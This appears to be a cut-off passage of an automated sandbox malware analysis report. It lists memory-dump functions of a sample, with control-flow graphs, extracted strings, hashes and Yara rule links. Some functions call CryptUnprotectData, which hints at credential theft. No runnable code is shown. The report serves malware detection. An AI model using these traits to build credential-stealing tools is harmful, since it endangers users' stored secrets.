                                                                                                        control_flow_graph 797 1529e0-152a3b 801 152a5d-152aac 797->801 802 152a3d-152a5c 797->802 806 152ac7-152acf 801->806 807 152aae-152ab5 801->807 810 152ad2-152ae6 806->810 808 152ab7-152abc 807->808 809 152abe-152ac5 807->809 808->810 809->810 813 152afc-152b04 810->813 814 152ae8-152aef 810->814 817 152b06-152b0a 813->817 815 152af5-152afa 814->815 816 152af1-152af3 814->816 815->817 816->817 819 152b0c-152b21 817->819 820 152b6a-152b6d 817->820 819->820 828 152b23-152b26 819->828 821 152bb5-152bbb 820->821 822 152b6f-152b84 820->822 823 1536b6 821->823 824 152bc1-152bc3 821->824 822->821 832 152b86-152b8a 822->832 829 1536bb-153c65 823->829 824->823 826 152bc9-152bce 824->826 830 153664-153668 826->830 831 152bd4 826->831 833 152b45-152b63 call 1502c8 828->833 834 152b28-152b2a 828->834 851 153c69-153ca4 829->851 836 15366f-1536b5 830->836 837 15366a-15366d 830->837 831->830 838 152b92-152bb0 call 1502c8 832->838 839 152b8c-152b90 832->839 833->820 834->833 840 152b2c-152b2f 834->840 837->829 837->836 838->821 839->821 839->838 840->820 841 152b31-152b43 840->841 841->820 841->833 851->851 853 153ca6-153cd9 851->853 857 153cdb-153cdd 853->857 858 153cea-153cf2 853->858 859 153ce3-153ce8 857->859 860 153cdf-153ce1 857->860 861 153cf4-153d02 858->861 859->861 860->861 864 153d04-153d06 861->864 865 153d18-153d20 861->865 866 153d0f-153d16 864->866 867 153d08-153d0d 864->867 868 153d23-153d26 865->868 866->868 867->868 870 153d3d-153d41 868->870 871 153d28-153d36 868->871 872 153d43-153d51 870->872 873 153d5a-153d5d 870->873 871->870 877 153d38 871->877 872->873 882 153d53 872->882 875 153d65-153d9a 873->875 876 153d5f-153d63 873->876 884 153dfc-153e01 875->884 876->875 879 153d9c-153db3 876->879 877->870 880 153db5-153db7 879->880 881 153db9-153dc5 879->881 880->884 885 153dc7-153dcd 881->885 886 153dcf-153dd9 881->886 882->873 887 153de1 885->887 886->887 888 153ddb 886->888 890 153de9-153df5 887->890 888->887 890->884
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Xoq$Xoq$Xoq$Xoq$Xoq$Xoq
                                                                                                        • API String ID: 0-1596160944
                                                                                                        • Opcode ID: 3d3714c01104eeb999fe8fbad2d64919232f7eda68326149fd9d95909e18ce08
                                                                                                        • Instruction ID: f7c2fbc4e12afc9cf2a5f728a753d4efdcc02fefd50aae7851a0686d176b6d9e
                                                                                                        • Opcode Fuzzy Hash: 3d3714c01104eeb999fe8fbad2d64919232f7eda68326149fd9d95909e18ce08
                                                                                                        • Instruction Fuzzy Hash: 0C325E6684D7D48FCB638B7848E815B7FB16B92205B8945DFC4C78B687DB28C609C362
                                                                                                        Function 39695028 Relevance: 8.1, Strings: 4, Instructions: 3069COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >B7$>B7$>B7$N
                                                                                                        • API String ID: 0-2431159481
                                                                                                        • Opcode ID: 8f26bfa3b9da2077c2c38a7136d71114949162efccc41dd004dbb7493955d45f
                                                                                                        • Instruction ID: e5043db7467698e2fb5131e445e77ec3f9b3a0f3f65bec38a1d88ed75be80760
                                                                                                        • Opcode Fuzzy Hash: 8f26bfa3b9da2077c2c38a7136d71114949162efccc41dd004dbb7493955d45f
                                                                                                        • Instruction Fuzzy Hash: 6273D631D10B5A8EDB11EF68C854AD9F7B1FF99300F51D69AE44867221EB70AAC4CF81
                                                                                                        Function 00155362 Relevance: 6.4, Strings: 5, Instructions: 195COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1738 155362-155364 1739 1553c4-155484 call 1541a0 call 153cc0 1738->1739 1740 155366-1553a0 1738->1740 1752 155486 1739->1752 1753 15548b-1554a9 1739->1753 1741 1553a7-1553c2 1740->1741 1742 1553a2 1740->1742 1741->1739 1742->1741 1752->1753 1783 1554ac call 155649 1753->1783 1784 1554ac call 155658 1753->1784 1754 1554b2-1554bd 1755 1554c4-1554c8 1754->1755 1756 1554bf 1754->1756 1757 1554cd-1554d4 1755->1757 1758 1554ca-1554cb 1755->1758 1756->1755 1760 1554d6 1757->1760 1761 1554db-1554e9 1757->1761 1759 1554ec-155530 1758->1759 1765 155596-1555ad 1759->1765 1760->1761 1761->1759 1767 155532-155548 1765->1767 1768 1555af-1555d4 1765->1768 1772 155572 1767->1772 1773 15554a-155556 1767->1773 1774 1555d6-1555eb 1768->1774 1775 1555ec 1768->1775 1778 155578-155595 1772->1778 1776 155560-155566 1773->1776 1777 155558-15555e 1773->1777 1774->1775 1779 155570 1776->1779 1777->1779 1778->1765 1779->1778 1783->1754 1784->1754
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: 7c5555c410e7d1ba43e234787983585e155fe6ce58de739ff4211f4f30eaa5ea
                                                                                                        • Instruction ID: e49f99af54051c80e65b4d15e79872efd26976b0917d63f2b3cb991ae219140e
                                                                                                        • Opcode Fuzzy Hash: 7c5555c410e7d1ba43e234787983585e155fe6ce58de739ff4211f4f30eaa5ea
                                                                                                        • Instruction Fuzzy Hash: 5E91D774E00618CFDB14CFA9D894A9DBBF2BF89301F15C069E819AB365EB349985CF50
                                                                                                        Function 0015C468 Relevance: 6.4, Strings: 5, Instructions: 191COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1785 15c468-15c471 1786 15c473-15c488 1785->1786 1787 15c48c-15c498 1785->1787 1786->1787 1788 15c49f-15c57c call 1541a0 call 153cc0 1787->1788 1789 15c49a 1787->1789 1799 15c583-15c5a4 call 155658 1788->1799 1800 15c57e 1788->1800 1789->1788 1802 15c5a9-15c5b4 1799->1802 1800->1799 1803 15c5b6 1802->1803 1804 15c5bb-15c5bf 1802->1804 1803->1804 1805 15c5c4-15c5cb 1804->1805 1806 15c5c1-15c5c2 1804->1806 1808 15c5d2-15c5e0 1805->1808 1809 15c5cd 1805->1809 1807 15c5e3-15c627 1806->1807 1813 15c68d-15c6a4 1807->1813 1808->1807 1809->1808 1815 15c6a6-15c6cb 1813->1815 1816 15c629-15c63f 1813->1816 1822 15c6e3 1815->1822 1823 15c6cd-15c6e2 1815->1823 1820 15c641-15c64d 1816->1820 1821 15c669 1816->1821 1824 15c657-15c65d 1820->1824 1825 15c64f-15c655 1820->1825 1826 15c66f-15c68c 1821->1826 1823->1822 1827 15c667 1824->1827 1825->1827 1826->1813 1827->1826
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: 9ddc2c7724e21cf980578eb82ef899f794239c6b0a264589031377b99850a8fb
                                                                                                        • Instruction ID: 10eca23fda33ab042648e5ff5db36d392c24bba873938b0fc0f4ec25fea75b0e
                                                                                                        • Opcode Fuzzy Hash: 9ddc2c7724e21cf980578eb82ef899f794239c6b0a264589031377b99850a8fb
                                                                                                        • Instruction Fuzzy Hash: 3D81C674E00218CFDB14DFAAD844A9DBBF2BF89301F14D06AE819AB365DB349945CF50
                                                                                                        Function 0015C19B Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1831 15c19b-15c19d 1832 15c19f-15c1a1 1831->1832 1833 15c1b8 1831->1833 1834 15c1a3-15c1b2 1832->1834 1835 15c1bc-15c1c8 1832->1835 1833->1835 1834->1833 1836 15c1cf-15c2ac call 1541a0 call 153cc0 1835->1836 1837 15c1ca 1835->1837 1847 15c2b3-15c2d4 call 155658 1836->1847 1848 15c2ae 1836->1848 1837->1836 1850 15c2d9-15c2e4 1847->1850 1848->1847 1851 15c2e6 1850->1851 1852 15c2eb-15c2ef 1850->1852 1851->1852 1853 15c2f4-15c2fb 1852->1853 1854 15c2f1-15c2f2 1852->1854 1856 15c302-15c310 1853->1856 1857 15c2fd 1853->1857 1855 15c313-15c357 1854->1855 1861 15c3bd-15c3d4 1855->1861 1856->1855 1857->1856 1863 15c3d6-15c3fb 1861->1863 1864 15c359-15c36f 1861->1864 1870 15c413 1863->1870 1871 15c3fd-15c412 1863->1871 1868 15c371-15c37d 1864->1868 1869 15c399 1864->1869 1872 15c387-15c38d 1868->1872 1873 15c37f-15c385 1868->1873 1874 15c39f-15c3bc 1869->1874 1871->1870 1875 15c397 1872->1875 1873->1875 1874->1861 1875->1874
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: dcb43b4af5529877e66b44e2ddd6302f8102156f023d13b0b5df64a38360e66d
                                                                                                        • Instruction ID: dedf1cd36ad829c62cd6ff139ddb072b00083ad20c903f450fc33f3d09fc741c
                                                                                                        • Opcode Fuzzy Hash: dcb43b4af5529877e66b44e2ddd6302f8102156f023d13b0b5df64a38360e66d
                                                                                                        • Instruction Fuzzy Hash: 4981B574E00218CFDB54DFAAD884A9DBBF2BF89301F14C06AE819AB365DB349945CF50
                                                                                                        Function 0015D278 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1879 15d278-15d2a8 1880 15d2af-15d38c call 1541a0 call 153cc0 1879->1880 1881 15d2aa 1879->1881 1891 15d393-15d3b4 call 155658 1880->1891 1892 15d38e 1880->1892 1881->1880 1894 15d3b9-15d3c4 1891->1894 1892->1891 1895 15d3c6 1894->1895 1896 15d3cb-15d3cf 1894->1896 1895->1896 1897 15d3d4-15d3db 1896->1897 1898 15d3d1-15d3d2 1896->1898 1900 15d3e2-15d3f0 1897->1900 1901 15d3dd 1897->1901 1899 15d3f3-15d437 1898->1899 1905 15d49d-15d4b4 1899->1905 1900->1899 1901->1900 1907 15d4b6-15d4db 1905->1907 1908 15d439-15d44f 1905->1908 1915 15d4f3 1907->1915 1916 15d4dd-15d4f2 1907->1916 1912 15d451-15d45d 1908->1912 1913 15d479 1908->1913 1917 15d467-15d46d 1912->1917 1918 15d45f-15d465 1912->1918 1914 15d47f-15d49c 1913->1914 1914->1905 1916->1915 1919 15d477 1917->1919 1918->1919 1919->1914
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: 98f617ac4e40d3e3df946bfa6343a3364e12889f4839ddac2aee69624234d5f4
                                                                                                        • Instruction ID: e3cf4ad5fe4a4a0edbf7aac4271ab6e609030dea97a1e046f2f0933f20bc6f7c
                                                                                                        • Opcode Fuzzy Hash: 98f617ac4e40d3e3df946bfa6343a3364e12889f4839ddac2aee69624234d5f4
                                                                                                        • Instruction Fuzzy Hash: C481C774E00218CFDB54DFAAD884A9DBBF2BF89301F14D069E819AB365DB34A945CF50
                                                                                                        Function 0015CA08 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1923 15ca08-15ca38 1925 15ca3f-15cb1c call 1541a0 call 153cc0 1923->1925 1926 15ca3a 1923->1926 1936 15cb23-15cb44 call 155658 1925->1936 1937 15cb1e 1925->1937 1926->1925 1939 15cb49-15cb54 1936->1939 1937->1936 1940 15cb56 1939->1940 1941 15cb5b-15cb5f 1939->1941 1940->1941 1942 15cb64-15cb6b 1941->1942 1943 15cb61-15cb62 1941->1943 1945 15cb72-15cb80 1942->1945 1946 15cb6d 1942->1946 1944 15cb83-15cbc7 1943->1944 1950 15cc2d-15cc44 1944->1950 1945->1944 1946->1945 1952 15cc46-15cc6b 1950->1952 1953 15cbc9-15cbdf 1950->1953 1960 15cc83 1952->1960 1961 15cc6d-15cc82 1952->1961 1957 15cbe1-15cbed 1953->1957 1958 15cc09 1953->1958 1962 15cbf7-15cbfd 1957->1962 1963 15cbef-15cbf5 1957->1963 1959 15cc0f-15cc2c 1958->1959 1959->1950 1961->1960 1964 15cc07 1962->1964 1963->1964 1964->1959
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: 0bf2b8a1e26d01a88a6ed5b80a20b1e66c45ee1676cde7f416a9fabbbd8e7540
                                                                                                        • Instruction ID: b4d08f500769f38cf2e430fa0173ae123cd69c1fc288e151f56dee3c1e3137ed
                                                                                                        • Opcode Fuzzy Hash: 0bf2b8a1e26d01a88a6ed5b80a20b1e66c45ee1676cde7f416a9fabbbd8e7540
                                                                                                        • Instruction Fuzzy Hash: 9481B574E00218CFDB14DFAAD984A9DBBF2BF89301F14D069E819AB365DB349985CF50
                                                                                                        Function 0015CCD8 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1968 15ccd8-15cd08 1969 15cd0f-15cdec call 1541a0 call 153cc0 1968->1969 1970 15cd0a 1968->1970 1980 15cdf3-15ce14 call 155658 1969->1980 1981 15cdee 1969->1981 1970->1969 1983 15ce19-15ce24 1980->1983 1981->1980 1984 15ce26 1983->1984 1985 15ce2b-15ce2f 1983->1985 1984->1985 1986 15ce34-15ce3b 1985->1986 1987 15ce31-15ce32 1985->1987 1989 15ce42-15ce50 1986->1989 1990 15ce3d 1986->1990 1988 15ce53-15ce97 1987->1988 1994 15cefd-15cf14 1988->1994 1989->1988 1990->1989 1996 15cf16-15cf3b 1994->1996 1997 15ce99-15ceaf 1994->1997 2003 15cf53 1996->2003 2004 15cf3d-15cf52 1996->2004 2001 15ceb1-15cebd 1997->2001 2002 15ced9 1997->2002 2005 15cec7-15cecd 2001->2005 2006 15cebf-15cec5 2001->2006 2007 15cedf-15cefc 2002->2007 2004->2003 2008 15ced7 2005->2008 2006->2008 2007->1994 2008->2007
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: 405119af6d7c453022e60291fc1a565d5f3e245dd275fcb4e18f39d3193e763d
                                                                                                        • Instruction ID: 1ed7fafec0878c9ef7cc2f24ced5dbd21bd9f930fbec0b760c8d46a65bd049a9
                                                                                                        • Opcode Fuzzy Hash: 405119af6d7c453022e60291fc1a565d5f3e245dd275fcb4e18f39d3193e763d
                                                                                                        • Instruction Fuzzy Hash: A281B374E00218DFDB14DFAAD884A9DBBF2BF89301F14D069E819AB365DB349985CF50
                                                                                                        Function 0015C738 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2012 15c738-15c768 2013 15c76f-15c84c call 1541a0 call 153cc0 2012->2013 2014 15c76a 2012->2014 2024 15c853-15c874 call 155658 2013->2024 2025 15c84e 2013->2025 2014->2013 2027 15c879-15c884 2024->2027 2025->2024 2028 15c886 2027->2028 2029 15c88b-15c88f 2027->2029 2028->2029 2030 15c894-15c89b 2029->2030 2031 15c891-15c892 2029->2031 2033 15c8a2-15c8b0 2030->2033 2034 15c89d 2030->2034 2032 15c8b3-15c8f7 2031->2032 2038 15c95d-15c974 2032->2038 2033->2032 2034->2033 2040 15c976-15c99b 2038->2040 2041 15c8f9-15c90f 2038->2041 2047 15c9b3 2040->2047 2048 15c99d-15c9b2 2040->2048 2045 15c911-15c91d 2041->2045 2046 15c939 2041->2046 2049 15c927-15c92d 2045->2049 2050 15c91f-15c925 2045->2050 2051 15c93f-15c95c 2046->2051 2048->2047 2052 15c937 2049->2052 2050->2052 2051->2038 2052->2051
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: fd1d53afb33268dba9f4fcd76a3965ca308c130d176310e999cb6e7aa47cf83f
                                                                                                        • Instruction ID: d948ce80f45799b9855637bb85a374c5dc186661696ccfd3798672c57cbdc26b
                                                                                                        • Opcode Fuzzy Hash: fd1d53afb33268dba9f4fcd76a3965ca308c130d176310e999cb6e7aa47cf83f
                                                                                                        • Instruction Fuzzy Hash: 1E81E574E00218CFDB14DFAAD984A9DBBF2BF88305F14D06AE819AB365DB349945CF50
                                                                                                        Function 0015CFAC Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2056 15cfac-15cfd8 2057 15cfdf-15d0bc call 1541a0 call 153cc0 2056->2057 2058 15cfda 2056->2058 2068 15d0c3-15d0e4 call 155658 2057->2068 2069 15d0be 2057->2069 2058->2057 2071 15d0e9-15d0f4 2068->2071 2069->2068 2072 15d0f6 2071->2072 2073 15d0fb-15d0ff 2071->2073 2072->2073 2074 15d104-15d10b 2073->2074 2075 15d101-15d102 2073->2075 2077 15d112-15d120 2074->2077 2078 15d10d 2074->2078 2076 15d123-15d167 2075->2076 2082 15d1cd-15d1e4 2076->2082 2077->2076 2078->2077 2084 15d1e6-15d20b 2082->2084 2085 15d169-15d17f 2082->2085 2091 15d223 2084->2091 2092 15d20d-15d222 2084->2092 2089 15d181-15d18d 2085->2089 2090 15d1a9 2085->2090 2093 15d197-15d19d 2089->2093 2094 15d18f-15d195 2089->2094 2095 15d1af-15d1cc 2090->2095 2092->2091 2096 15d1a7 2093->2096 2094->2096 2095->2082 2096->2095
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                                                                        • API String ID: 0-1749821215
                                                                                                        • Opcode ID: f80c0f65ab550ba9ec293594b546fce422d52b1ac01e4d9d00961fe2e22f767c
                                                                                                        • Instruction ID: 858c17a10d5cab686d967b46e2e7e44e6365e7f336a9b09326f2e35c4f120938
                                                                                                        • Opcode Fuzzy Hash: f80c0f65ab550ba9ec293594b546fce422d52b1ac01e4d9d00961fe2e22f767c
                                                                                                        • Instruction Fuzzy Hash: 6481B574E00618CFDB14DFAAD984A9DBBF2BF89301F14C069E819AB365DB349985CF50
                                                                                                        Function 00159DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (okq$4'kq$4'kq$4'kq
                                                                                                        • API String ID: 0-323808577
                                                                                                        • Opcode ID: 6bd0ca61d7e3c28b12529934258c8bea049d60db6544d02b67b7207718c68c52
                                                                                                        • Instruction ID: f910d8d03ede18e1d3519cd1cc87da67b13ab752ceb405a5af751a5da40829fc
                                                                                                        • Opcode Fuzzy Hash: 6bd0ca61d7e3c28b12529934258c8bea049d60db6544d02b67b7207718c68c52
                                                                                                        • Instruction Fuzzy Hash: 78A28230640209CFCB15CFA8C994AAEBBF2BF88301F558659E815DF261D735ED89CB52
                                                                                                        Function 00156FC8 Relevance: 5.5, Strings: 4, Instructions: 451COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (okq$(okq$,oq$,oq
                                                                                                        • API String ID: 0-2865278577
                                                                                                        • Opcode ID: 0f43b1f8deaeb86d259a51c8e563369066274d4a5fc3a6937aabfe4437d6ad64
                                                                                                        • Instruction ID: 5c0a0dd2f417461ef25efc83db7e9ac4c9e6f54c9214fe982a7469291cbcfb0e
                                                                                                        • Opcode Fuzzy Hash: 0f43b1f8deaeb86d259a51c8e563369066274d4a5fc3a6937aabfe4437d6ad64
                                                                                                        • Instruction Fuzzy Hash: CE025030A04219DFCB15CF68E885AADBBF2BF49311F158069EC25EB2A1D730DD89CB51
                                                                                                        Function 001569A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (okq$Hoq
                                                                                                        • API String ID: 0-4134915641
                                                                                                        • Opcode ID: 6584a81e85578d67077be0abdf285c66e25fe4e107f472eacf4c30d6ec48c36a
                                                                                                        • Instruction ID: cabcb044c0ddc5b9f5704c8dd06a1381dedf86cab483e66757db4f1c4f87c5d1
                                                                                                        • Opcode Fuzzy Hash: 6584a81e85578d67077be0abdf285c66e25fe4e107f472eacf4c30d6ec48c36a
                                                                                                        • Instruction Fuzzy Hash: D8126F70B00219CFDB14DF69C954AAEBBF6BF88301F208569E859DB3A5DB309D45CB90
                                                                                                        Function 39D78EF1 Relevance: 1.6, APIs: 1, Instructions: 57encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 39D78F5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974489659.0000000039D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39d70000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CryptDataUnprotect
                                                                                                        • String ID:
                                                                                                        • API String ID: 834300711-0
                                                                                                        • Opcode ID: e32585f787ba08ced7d295733baaefcd4bf2858c45e6d6f93a34b9567a31de57
                                                                                                        • Instruction ID: e0cb21f74cda8075862a86ba68d15ff6b12c610a54e4950cd37dd44fd1204e5b
                                                                                                        • Opcode Fuzzy Hash: e32585f787ba08ced7d295733baaefcd4bf2858c45e6d6f93a34b9567a31de57
                                                                                                        • Instruction Fuzzy Hash: 111156B2800209AFDB10CF99C945BEEBFF5EF48320F14841AE958A7210C339A590DFA5
                                                                                                        Function 39D787A8 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 39D78F5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974489659.0000000039D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39d70000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CryptDataUnprotect
                                                                                                        • String ID:
                                                                                                        • API String ID: 834300711-0
                                                                                                        • Opcode ID: 8519baf19b9feebf4524b3b994a83b52344a98bd05d213587afdcc2baf68e871
                                                                                                        • Instruction ID: 076e488983ba405cb63e10fd1d6e77695ce944afb76b57f00dbada72099aa1d6
                                                                                                        • Opcode Fuzzy Hash: 8519baf19b9feebf4524b3b994a83b52344a98bd05d213587afdcc2baf68e871
                                                                                                        • Instruction Fuzzy Hash: BD1144B2800309AFDB10CF99C945BDEBBF5EF48320F108419E558A7610C775A550DFA5
                                                                                                        Function 39D78FB0 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974489659.0000000039D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39d70000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `([7
                                                                                                        • API String ID: 0-3452837591
                                                                                                        • Opcode ID: 325580527dc0acd89372a9cbb238f1ddc07f4fad13cdf678fbab26628e4496d2
                                                                                                        • Instruction ID: 21aa8412c5bb1a0a8625e87386bb14a7c45c3a296ce6858176545069c6cf53c4
                                                                                                        • Opcode Fuzzy Hash: 325580527dc0acd89372a9cbb238f1ddc07f4fad13cdf678fbab26628e4496d2
                                                                                                        • Instruction Fuzzy Hash: FDD18C78E01218CFDB55DFA5C990B9DBBB2AF89300F1080A9D809BB365DB359D86CF51
                                                                                                        Function 3A7C56B8 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `([7
                                                                                                        • API String ID: 0-3452837591
                                                                                                        • Opcode ID: fd847eda2f636b0b33864ed2f28ce8c3f78270d30333ea5c4fd7c2d588d9a34d
                                                                                                        • Instruction ID: c2df84341cb5d5a389238d95fac9f47ae3388b7255ba96da677939081fd3f80a
